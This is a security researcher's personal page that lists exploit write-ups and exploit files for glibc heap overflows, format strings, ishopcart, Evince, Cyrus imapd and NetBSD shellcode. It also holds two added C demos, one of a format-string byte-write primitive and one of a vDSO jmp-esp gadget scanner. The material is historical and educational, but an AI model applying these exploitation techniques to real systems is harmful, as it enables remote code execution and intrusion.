tptp.cc security.html


Here I place code and articles I've written in the security field over the years. I've had to redo this page many times, and find the articles and code again on the internet, because I'm always losing code.. articles.. entire operating systems.. and minds.. residents.. etc :). One exploit that is not here is the Exim exploit I wrote in Perl. I note it because, like the ones here, it was very universal for a memory-corruption exploit and very stable from one Unix to the next and from one microprocessor architecture to the next. I lost it. I will eventually rewrite it in C and round out this little corner of history.

house_of_mind.txt 01/01/2007 - The House of Mind - This article explains and demonstrates how to exploit heap overflows through the heap's own bookkeeping structures in the then-current Linux glibc, proving once again that it was still possible after the old, easy unlink() method was patched in 2004 and stopped working. The article by "blackngel" in the latest Phrack (66, "Malloc Des-Maleficarum", as of May 13, 2010) builds on this one: it demonstrates the other methods suggested in the "Malloc Maleficarum" and adds newly discovered (and public) methods for exploiting glibc heap overflows in a definite and static fashion. He also makes some minor modifications to my POC.
fmat.txt 10/10/2006 - An Alternative Method in Format String Exploitation - This article describes how to make format string exploits static and practical again on systems with ASLR (or "random VA"), such as the Linux of the day. It describes how one could write the entire *SHELLCODE* to a definite address using the format string's write primitive, so that its location is known in advance. After that the exploiter needs to get that address executed in some equally static way, such as placing it in .dtors (the ELF destructor table, whose entries are called at exit).
bofoml.txt 05/31/2010 - Buffer Overflows on Modern Linux - This article describes how the standard method of returning from a stack frame is no longer used on Linux, and explains and demonstrates how a generic buffer overflow is exploited on modern Linux.
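An added example of the write primitive the fmat.txt article builds on (editor's code, not the article's or tptp's): each %hhn stores the number of characters printed so far into a one-byte target, so choosing the padding width chooses the byte, and repeating that per byte lays an arbitrary payload down at an address you already know. The format here is a string literal with the target address passed as a normal argument, so it also runs under _FORTIFY_SOURCE; in the attack the attacker supplies the whole format and reaches the addresses he placed on the stack with "%N$hhn" positional conversions. The payload bytes and the landing buffer are constructed for the demo and nothing is executed.

```c
#include <stdio.h>
#include <string.h>

/* Deposit one byte at dst with a single %hhn write.  "%*c" pads its output to
 * `width` characters, so the character count that %hhn stores is width mod 256.
 * %c always emits at least one character, so a zero byte is written with width
 * 256, which wraps to 0x00.  The format is a string literal and the target
 * address a normal argument, so this also runs under _FORTIFY_SOURCE, which
 * aborts on %n in formats that sit in writable memory; in the real attack the
 * attacker supplies the whole format and reaches the addresses he placed on
 * the stack with "%N$hhn" positional conversions. */
static void fmt_write_byte(unsigned char *dst, unsigned char value)
{
    char sink[300];                        /* holds the up-to-256 padding bytes */
    int width = value ? value : 256;
    snprintf(sink, sizeof sink, "%*c%hhn", width, 'A', (signed char *)dst);
}

/* Lay `len` payload bytes down at dst one %hhn write at a time; this is how the
 * article puts the whole shellcode at an address that is known in advance. */
void fmt_write_bytes(unsigned char *dst, const unsigned char *payload, size_t len)
{
    for (size_t i = 0; i < len; i++)
        fmt_write_byte(dst + i, payload[i]);
}

/* Constructed stand-in for shellcode (deliberately includes 0x00 and 0xff, the
 * awkward bytes); it is copied, never executed. */
static const unsigned char payload[] = { 0x31, 0xc0, 0x00, 0xff, 0x90, 0xcc };

/* The landing zone: in the attack this would be a writable, later-executable
 * address the exploiter already knows; here it is just a global buffer. */
unsigned char landing[sizeof payload];

/* Returns 1 when every payload byte arrived intact. */
int fmt_write_demo(void)
{
    memset(landing, 0xaa, sizeof landing);
    fmt_write_bytes(landing, payload, sizeof payload);
    return memcmp(landing, payload, sizeof payload) == 0;
}

int main(void)
{
    int ok = fmt_write_demo();
    printf("landing:");
    for (size_t i = 0; i < sizeof landing; i++)
        printf(" %02x", landing[i]);
    printf("  (%s)\n", ok ? "matches payload" : "MISMATCH");
    return ok ? 0 : 1;
}
```

One write per byte keeps each %hhn independent of the ones before it; in a single attacker-supplied format the widths have to account for the running character count instead, which is the usual source of off-by-one bytes in hand-built format strings.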
ishopcart-cgi-bof.c
ishopcart-cgi-bof.c.txt
An exploit I wrote for a buffer overflow I found in a CGI shopping-cart system written in C, called ishopcart. It had rather great execution success because the CGI could be requested as many times as desired, so a simple shell wrapper around the exploit could brute-force the correct offset.
evince-ps-field-bof.c
evince-ps-field-bof.c.txt
This is an exploit I wrote for the Evince document viewer after a vulnerability was discovered in 'gv'. It had rather great execution success because it used a "jmp *esp" as its return address, and at the time that instruction sat at the same address in every userland process on 2.6 Linux kernels (it lives in the kernel-provided vDSO, linux-gate.so.1), so the exploit also bypassed ASLR. Just clicking a .pdf in your browser could start Evince, and since the jmp *esp was static across all 2.6 userland processes, it was almost guaranteed to execute on any then-current vanilla Linux installation. Later kernels randomise the vDSO base along with the rest of the address space, which is what eventually killed this trick.
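An added check for the gadget the Evince exploit relied on (editor's code, not part of the exploit or this page): it asks the kernel for the vDSO base through the auxiliary vector, walks the ELF program headers to learn how much is mapped, and scans the image for the opcode bytes ff e4, which decode as jmp *%esp on i386 and jmp *%rsp on x86_64. On the early 2.6 i386 kernels the exploit targeted, the base came out as 0xffffe000 in every process; run this a few times on a current kernel and the base moves between runs, and the gadget may not be present at all. Linux-only (glibc or musl); it assumes the vDSO's file offsets match its mapped offsets, which is how modern kernels build the image.

```c
#include <elf.h>
#include <link.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/auxv.h>

/* Where the kernel mapped the vDSO in this process (linux-gate.so.1 on i386,
 * linux-vdso.so.1 on x86_64).  The kernel hands the address to every process
 * in the auxiliary vector as AT_SYSINFO_EHDR; 0 means there is no vDSO. */
uintptr_t vdso_base(void)
{
    return (uintptr_t)getauxval(AT_SYSINFO_EHDR);
}

/* Number of bytes mapped for the vDSO image: the end of the furthest PT_LOAD
 * segment.  Assumes file offsets equal mapped offsets, which holds for the
 * flat, prelinked image modern kernels build and map as one blob. */
size_t vdso_size(void)
{
    const ElfW(Ehdr) *eh = (const ElfW(Ehdr) *)vdso_base();
    if (eh == NULL || memcmp(eh->e_ident, ELFMAG, SELFMAG) != 0)
        return 0;
    const ElfW(Phdr) *ph = (const ElfW(Phdr) *)((const char *)eh + eh->e_phoff);
    size_t end = sizeof *eh;
    for (unsigned i = 0; i < eh->e_phnum; i++) {
        size_t seg_end = (size_t)(ph[i].p_offset + ph[i].p_filesz);
        if (ph[i].p_type == PT_LOAD && seg_end > end)
            end = seg_end;
    }
    return end;
}

/* Scan the mapped vDSO for the opcode bytes ff e4: "jmp *%esp" on i386 and
 * "jmp *%rsp" on x86_64.  Returns the address of the first hit, or 0. */
uintptr_t find_jmp_sp(void)
{
    const unsigned char *img = (const unsigned char *)vdso_base();
    size_t n = vdso_size();
    for (size_t i = 0; n >= 2 && i + 1 < n; i++)
        if (img[i] == 0xff && img[i + 1] == 0xe4)
            return (uintptr_t)(img + i);
    return 0;
}

int main(void)
{
    uintptr_t base = vdso_base(), gadget = find_jmp_sp();
    printf("vDSO base %#lx, %zu bytes mapped\n", (unsigned long)base, vdso_size());
    if (gadget)
        printf("ff e4 (jmp *sp) at %#lx = base+%#lx\n",
               (unsigned long)gadget, (unsigned long)(gadget - base));
    else
        printf("no ff e4 in this vDSO: a fixed gadget address would not work here\n");
    return 0;
}
```

The scan is byte-level, so a hit may be the tail of a longer instruction rather than an intended jmp; for a return-address gadget that does not matter, since execution only has to land on the ff e4 bytes themselves.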
bid-18056.pl
bid-18056.txt
This exploit was for Cyrus imapd. It had rather great execution success because the overflow placed the shellcode in the stack space that *user and *userbuf pointed to, then overwrote EIP and *out with the same address; the data at *user/*userbuf was then copied to the address held in *out. In other words, put any writable and executable address (one the shellcode's own stores won't clobber) into both EIP and *out, and the shellcode at *user/*userbuf gets copied to *out, which is the very address EIP returns to. Great :)
create_conns.c
create_conns.c.txt
Some code I wrote on 10/04/2009 for no real purpose; I just wanted to write something I'd feel good writing :). It opens connections to a server, with more options than just that: child processes, a nanosecond sleep between sockets, a sleep in seconds after every N sockets, a text string to send once connected, etc.
netbsd_5_0_x64_execve_bin_sh.c
netbsd_5_0_x64_execve_bin_sh.c.txt
This is execve("/bin/sh") shellcode for x86_64 NetBSD. milw0rm didn't have any NetBSD x86_64 shellcode yet, so here it is. My next project is a callback (connect-back) shell for NetBSD x86_64, but that's some work and I'm still a n00b :).